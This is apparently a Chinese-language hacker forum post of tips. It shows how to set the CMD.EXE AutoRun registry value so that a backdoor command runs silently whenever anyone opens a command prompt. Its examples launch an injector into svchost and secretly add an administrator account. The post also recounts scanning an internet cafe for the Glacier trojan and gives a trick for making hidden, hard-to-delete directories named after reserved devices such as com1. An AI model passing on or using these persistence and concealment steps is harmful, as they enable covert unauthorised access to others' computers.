一個有趣的小竅門

無聊，cmd /?後看見好多東西，其中有個好玩的：
*******************
如果 /D 未在命令列上被指定，當 CMD.EXE 開始時，它會尋找
以下 REG_SZ/REG_EXPAND_SZ 註冊表變數。如果其中一個或
兩個都存在，這兩個變數會先被執行。

HKEY_LOCAL_MACHINE/Software/Microsoft/Command Processor/AutoRun

和/或

HKEY_CURRENT_USER/Software/Microsoft/Command Processor/AutoRun
******************
呵呵，又是一個放後門的好地方。我用@c:/InjShell.exe svchost.exe 1026 >nul 後，開啟CMD什麼異常現象都沒有(當然不包括c:/InjShell.exe)。如果用net user mix /add & net localgroup administrators mix /add 豈不是成了《不死帳號》續集？大家自己琢磨吧~~~

有人問具體的做法，隨手寫寫，還不懂的話，就是我的表達能力有問題了 ：）呵呵

先用regedit開啟HKEY_LOCAL_MACHINE/Software/Microsoft/Command Processor或HKEY_CURRENT_USER/Software/Microsoft/Command Processor ，看見這個主健下是不是有AutoRun健，將AutoRun索引值改為你想要得命令即可。比如我上面用的用@c:/InjShell.exe svchost.exe 1026 >nul ，有人使用cmd的話，就會自動執行你設定的命令。

我發現我和親戚、朋友出來玩的話，一般都是要去網吧上那麼一陣網，今天也不例外。

和表弟上了一陣後，便準備下機，但是表弟一定要將QQ的資料刪掉才肯走，這個網吧是用的無盤系統，他試了半天也進不了QQ目錄。呵呵，我當然是輕而易舉點進去了（有過一定的研究），隨意一看，馬上傻眼了---裝了冰河。暈！！！

用冰河的用戶端一搜，網吧沒一台機子倖免於難，服務端還設了密碼~~~太毒了！本來想用冰河的漏洞將其全部毀滅，但是他用的這個版本偏是修訂過了，服務端程式又不小心被我刪掉了，網吧又不允許下載，要不我又可以重新下個新的。我表弟就一撒手，一定要我幫他搞定，害得我急火攻心（我的QQ哇），什麼都不記得拉。

正好，又有2個人上機（同步選取電源），估計網吧的電源線路穩壓不夠，而且我們坐的這台機子電源也不是什麼好傢夥，跟著就重起了。算了算了，我拉著表弟去結賬，馬上換家安全點的網吧該密碼就是的。

一路上，我表弟都在糗我：“總看你講安全，安全意識還沒我高，要不是我要刪QQ資料，密碼怎麼被該都不會知道怎麼回事！...到了關鍵時候，一個冰河都搞不定，逼得要改密碼！...哼哼~~~”---我暈列！！！

換了個網吧後，我的心早就安定了，同樣的無盤網吧（一個公司做的）三下五除二就突破了網吧的禁止下載等限制。先看看進程列表中沒有可疑項，開啟msconfig看看開機檔案，恩！這個網吧的這台機子似乎沒有什麼安全問題，是該密碼的時候了。最後，找了個冰河掃了掃7626，沒有幸運兒。

最後，又到了總結的時候了。通過這件事，我學到了以下4點：
1.萬事都要小心，安全第一。下回上網吧，一定先檢查一下進程列表。
2.萬事的處理都需要一顆平靜的心，有待加強。
3.不管怎麼樣，發現密碼有可能泄漏之後，該密碼是必然的！就像發現被入侵之後，很多安全專家建議馬上重裝系統一樣---最可靠的方法。
4.冰河可以用查看無盤系統主機上隱藏的資源，是我現在發現的最方便的一種辦法（像在用資源管理員）。

哦哦哦，好！我終於有辦法了，這樣做了以後，不知道的話就很難刪掉這個目錄了，當然不包括format。呵呵~~~

大家應該知道window對像com1、com2、aux、lpt1這些系統裝置名有保護，也就是講我們不能建立以這些名字為名的目錄。這樣的話，如果我有能力建立這樣的目錄，那我們就可以實現對目錄的保護了。

今天，不想上網，所以就消化一下以前下的教程，看到這樣一篇文章：《如何在PUB上面建立一個隱秘的、受保護的目錄？》，其作者只是使用flashFXP完成的操作，其他軟體沒有嘗試。呵呵~~~果然有所啟發，取其中比較重要的一段話讓大家看看：
**************************
總結:
基本意思是說必須在NT系統下,你可以建立任何目錄如果你在目錄名後面加/(1)/,包括那些平時不能建立的com1,com2,aux,lpt1等等.比如你建立了com1/(1)/,包括你在內的所有人都不能訪問,只有再建立com1/aaa/(1)/,用/com1/aaa/就可以訪問了,而aaa這個名字你不說誰也不知道.還有很重要一點,很多情況下只有用flashfxp才可以建立這些目錄,另外如果發現根目錄下有tagged,by xxx等字樣的盡量不要使用,這說明有人正在用,一般的規矩是如果tagged超過一個月就可以使用,但是在根目錄建立tagged有一定危險性,因為網官很容易發現.
****************************

根據上面介紹的技巧，自己實踐一下後發現直接用md com1/(1)/是不行的，但是我又試了其它幾種方法，如：md com1/(1)/ 、md com1/ / 等等，都不行。最後終於發現可以用md com1/ 可以建立名為com1的目錄（同時還會在com1同級目錄下建立一個名為1的目錄），然後又用md com1/mix/ 命令就可以在com1下建立mix目錄（同時還會在com1同級目錄下建立一個名為2的目錄），這時我們可以在CMD環景下將你想要的檔案等copy到com1/mix/下去。如果，管理員想在資源管理員中點開com1目錄，將會死機，只能通過在CMD環景下dir com1/*.*這樣訪問檔案。刪除這個目錄只能先將這個目錄下的東西清空，然後通過命令rd com1/ /將其刪掉。

卡卡~~~一個小竅門而已，好玩！